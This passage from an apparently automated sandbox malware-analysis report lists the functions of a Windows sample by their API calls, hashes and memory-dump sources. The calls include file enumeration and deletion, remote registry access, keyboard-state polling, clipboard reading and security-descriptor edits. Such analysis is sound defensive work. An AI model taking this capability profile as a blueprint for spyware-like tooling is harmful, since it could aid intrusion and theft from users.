                                                                                  • __swprintf.LIBCMT ref: 0053F8A7
                                                                                  • __swprintf.LIBCMT ref: 0053F8F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 835046349-2428617273
                                                                                  • Opcode ID: 0962b84eccde80461b9d0554b1c3fcba1da416fdab74775a491c2b88b5616643
                                                                                  • Instruction ID: 00307fe591bd3f9d4618b4020efa666f20a9b043f2e04841b6116adf26c60604
                                                                                  • Opcode Fuzzy Hash: 0962b84eccde80461b9d0554b1c3fcba1da416fdab74775a491c2b88b5616643
                                                                                  • Instruction Fuzzy Hash: DEA10EB2408345ABD314EB95C985DBFB7ECBF98704F400C2EB68587192EB34D949CB62
                                                                                  Function 00541B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00541B50
                                                                                  • _wcscmp.LIBCMT ref: 00541B65
                                                                                  • _wcscmp.LIBCMT ref: 00541B7C
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00541B8E
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00541BA8
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00541BC0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541BCB
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00541BE7
                                                                                  • _wcscmp.LIBCMT ref: 00541C0E
                                                                                  • _wcscmp.LIBCMT ref: 00541C25
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00541C37
                                                                                  • SetCurrentDirectoryW.KERNEL32(005A39FC), ref: 00541C55
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00541C5F
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541C6C
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541C7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1803514871-438819550
                                                                                  • Opcode ID: 8f90f027f98d9b6f9c3747d7e3ab26e04cd251d4040b3e3c43b3de0556b684b0
                                                                                  • Instruction ID: 7a9209abcbcff83c3edff6b5bf83113b10366a18aca62fd0521f3f0258b6235f
                                                                                  • Opcode Fuzzy Hash: 8f90f027f98d9b6f9c3747d7e3ab26e04cd251d4040b3e3c43b3de0556b684b0
                                                                                  • Instruction Fuzzy Hash: 2B31C532541A1A6EDB10AFA0EC8DADE7BBCBF45318F104195F915E3090EB70DEC5DA68
                                                                                  Function 00541C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00541CAB
                                                                                  • _wcscmp.LIBCMT ref: 00541CC0
                                                                                  • _wcscmp.LIBCMT ref: 00541CD7
                                                                                    • Part of subcall function 00536BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00536BEF
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00541D06
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541D11
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00541D2D
                                                                                  • _wcscmp.LIBCMT ref: 00541D54
                                                                                  • _wcscmp.LIBCMT ref: 00541D6B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00541D7D
                                                                                  • SetCurrentDirectoryW.KERNEL32(005A39FC), ref: 00541D9B
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00541DA5
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541DB2
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541DC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1824444939-438819550
                                                                                  • Opcode ID: eb2a0b71e2f38a836adeebb99a68a6945f97626f72e4a10ee7a7c999d3107133
                                                                                  • Instruction ID: 3eca8ba121a45876bc18d4a3c277b9a533cd92f46a814bd1a5e70a6772e0d72a
                                                                                  • Opcode Fuzzy Hash: eb2a0b71e2f38a836adeebb99a68a6945f97626f72e4a10ee7a7c999d3107133
                                                                                  • Instruction Fuzzy Hash: AD31E572901A1A6ADF10AFA0EC49ADE7FB9BF45328F100551E905A2091DB70DEC5DA68
                                                                                  Function 004F7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                  • API String ID: 2102423945-2023335898
                                                                                  • Opcode ID: 2778c539bf4dadf93eb2ce65ec2c308b80a8d07bc9901cad0954f437003a2eeb
                                                                                  • Instruction ID: 9fb56ddbb77d939a67f67d6874ef4844ac1483f2a6d670deb3d8f70e052fea95
                                                                                  • Opcode Fuzzy Hash: 2778c539bf4dadf93eb2ce65ec2c308b80a8d07bc9901cad0954f437003a2eeb
                                                                                  • Instruction Fuzzy Hash: B482D071D04219CBCF24CF98D8807BEBBB1BF44314F25816AD919AB391E738AD85CB94
                                                                                  Function 0054091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 005409DF
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005409EF
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005409FB
                                                                                  • __wsplitpath.LIBCMT ref: 00540A59
                                                                                  • _wcscat.LIBCMT ref: 00540A71
                                                                                  • _wcscat.LIBCMT ref: 00540A83
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00540A98
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540AAC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540ADE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540AFF
                                                                                  • _wcscpy.LIBCMT ref: 00540B0B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00540B4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                  • String ID: *.*
                                                                                  • API String ID: 3566783562-438819550
                                                                                  • Opcode ID: 32d3aedd53c510892db6f732699a7fca09291235de0b4c80f764ac52e822a17e
                                                                                  • Instruction ID: ec1756b2ca2981b4aef5fec9106f6bd0b78bf947abba3f4480114a53c68d2da0
                                                                                  • Opcode Fuzzy Hash: 32d3aedd53c510892db6f732699a7fca09291235de0b4c80f764ac52e822a17e
                                                                                  • Instruction Fuzzy Hash: 37617B725043059FD710EF60C8449AEB7E8FF89318F14891EFA89C7292DB35E949CB92
                                                                                  Function 004F6F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Y$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv$YYY Y
                                                                                  • API String ID: 0-3025411547
                                                                                  • Opcode ID: 84fa5db98b5b42208247b02c0967c3df479d77cce5d7eaa39d2d9baecded38c7
                                                                                  • Instruction ID: 76884b7e46babee73d981bf1b574257091b95f3535399216975e35597e75522e
                                                                                  • Opcode Fuzzy Hash: 84fa5db98b5b42208247b02c0967c3df479d77cce5d7eaa39d2d9baecded38c7
                                                                                  • Instruction Fuzzy Hash: 50729171E042199BDF24CF59D8407BEBBB5BF44310F14816AE909EB381DB789E41EB94
                                                                                  Function 0052A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
                                                                                    • Part of subcall function 0052ABBB: GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
                                                                                    • Part of subcall function 0052ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
                                                                                    • Part of subcall function 0052ABBB: HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                    • Part of subcall function 0052AC56: GetProcessHeap.KERNEL32(00000008,0052A6B5,00000000,00000000,?,0052A6B5,?), ref: 0052AC62
                                                                                    • Part of subcall function 0052AC56: HeapAlloc.KERNEL32(00000000,?,0052A6B5,?), ref: 0052AC69
                                                                                    • Part of subcall function 0052AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0052A6B5,?), ref: 0052AC7A
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0052A6D0
                                                                                  • _memset.LIBCMT ref: 0052A6E5
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0052A704
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A715
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0052A752
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0052A76E
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A78B
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0052A79A
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052A7A1
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0052A7C2
                                                                                  • CopySid.ADVAPI32(00000000), ref: 0052A7C9
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0052A7FA
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0052A820
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0052A834
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: c1c87b74d93054fbb0ae4e0c8c8f70d4d53ae36f13ed827526c4c3e957038e24
                                                                                  • Instruction ID: 6722b6d72021295def7cb5dd14e5e02953797d43f38a982cc4067c1602ee649c
                                                                                  • Opcode Fuzzy Hash: c1c87b74d93054fbb0ae4e0c8c8f70d4d53ae36f13ed827526c4c3e957038e24
                                                                                  • Instruction Fuzzy Hash: 96516C7190021AAFDF00DFA5EC48EEEBBB9FF05300F048129F915A7291EB359A45DB61
                                                                                  Function 005363F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • _wcscat.LIBCMT ref: 00536441
                                                                                  • __wsplitpath.LIBCMT ref: 0053645F
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00536474
                                                                                  • _wcscpy.LIBCMT ref: 005364A3
                                                                                  • _wcscat.LIBCMT ref: 005364B8
                                                                                  • _wcscat.LIBCMT ref: 005364CA
                                                                                  • DeleteFileW.KERNEL32(?), ref: 005364DA
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005364EB
                                                                                  • FindClose.KERNEL32(00000000), ref: 00536506
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2643075503-1173974218
                                                                                  • Opcode ID: 5ae29ca9c07cda0358cd566dece9de8573853940ef8999128430da7f18bb3c4f
                                                                                  • Instruction ID: 3a88b11377a1997e1dc6357852450456fbd348ddc4f101ba0dcb7f0cbf4e8ded
                                                                                  • Opcode Fuzzy Hash: 5ae29ca9c07cda0358cd566dece9de8573853940ef8999128430da7f18bb3c4f
                                                                                  • Instruction Fuzzy Hash: 7B31B4B2408385AAC721DBA48889DDBBBECBF95300F40492EF6D9C3141EA35D54D97A7
                                                                                  Function 005531BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0055328E
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0055332D
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005533C5
                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00553604
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00553611
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1240663315-0
                                                                                  • Opcode ID: b7ab40c57ee7b8696d55ba616ef6cdba6b294100dcfffddf736f5100a09ab8b8
                                                                                  • Instruction ID: 85ccd9e60545f0711deb03c5cf8b68fba62a562a5cb42686dd224ac1e1fa4f6a
                                                                                  • Opcode Fuzzy Hash: b7ab40c57ee7b8696d55ba616ef6cdba6b294100dcfffddf736f5100a09ab8b8
                                                                                  • Instruction Fuzzy Hash: 3BE13C75604204AFCB14DF29C995E2ABBF8FF88354F04886EF94AD7261DA34ED09CB51
                                                                                  Function 00532B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00532B5F
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00532BE0
                                                                                  • GetKeyState.USER32(000000A0), ref: 00532BFB
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00532C15
                                                                                  • GetKeyState.USER32(000000A1), ref: 00532C2A
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00532C42
                                                                                  • GetKeyState.USER32(00000011), ref: 00532C54
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00532C6C
                                                                                  • GetKeyState.USER32(00000012), ref: 00532C7E
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00532C96
                                                                                  • GetKeyState.USER32(0000005B), ref: 00532CA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 0e324d5ca4d95de68f587234b9abfc0d6b98fdbe4ba1f24f2755537a90f9bc1c
                                                                                  • Instruction ID: 71f7f780d5ca8102bc767b176aa35f03c544453ce25a817275cbf28b2bdaeb5c
                                                                                  • Opcode Fuzzy Hash: 0e324d5ca4d95de68f587234b9abfc0d6b98fdbe4ba1f24f2755537a90f9bc1c
                                                                                  • Instruction Fuzzy Hash: 5C41C130604FCD7AFF359B6488143A9BFB07F21304F089059D9C6962C2EBA49DC8D7A2
                                                                                  Function 00546D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: 0be26657268af342c2fbb543ffaa007ee641895bc5ebfa6d553fb7649432eec9
                                                                                  • Instruction ID: d0c69f8b0ece608468c5c49b5d08d7caff82c5825be1c07f396acef28f601a66
                                                                                  • Opcode Fuzzy Hash: 0be26657268af342c2fbb543ffaa007ee641895bc5ebfa6d553fb7649432eec9
                                                                                  • Instruction Fuzzy Hash: 6521DE31700515AFEB00AF24EC49B6D7BB8FF94710F10841AF90ADB2A1CB34EC45ABA5
                                                                                  Function 0054C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00529ABF: CLSIDFromProgID.OLE32 ref: 00529ADC
                                                                                    • Part of subcall function 00529ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00529AF7
                                                                                    • Part of subcall function 00529ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00529B05
                                                                                    • Part of subcall function 00529ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00529B15
                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0054C235
                                                                                  • _memset.LIBCMT ref: 0054C242
                                                                                  • _memset.LIBCMT ref: 0054C360
                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0054C38C
                                                                                  • CoTaskMemFree.OLE32(?), ref: 0054C397
                                                                                  Strings
                                                                                  • NULL Pointer assignment, xrefs: 0054C3E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                  • String ID: NULL Pointer assignment
                                                                                  • API String ID: 1300414916-2785691316
                                                                                  • Opcode ID: bea0e163e208f5d263a8b111d882b1d3d993c419b5d715dd03b8fffa8c87cd4e
                                                                                  • Instruction ID: a10faa369d13df0907d149bf6f02127420835c08dd1be42adf19b7f5260b453f
                                                                                  • Opcode Fuzzy Hash: bea0e163e208f5d263a8b111d882b1d3d993c419b5d715dd03b8fffa8c87cd4e
                                                                                  • Instruction Fuzzy Hash: 76913871D01219ABDB10DF95DC95EEEBFB8BF48314F10812AF519A7281DB70AA45CFA0
                                                                                  Function 005379D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
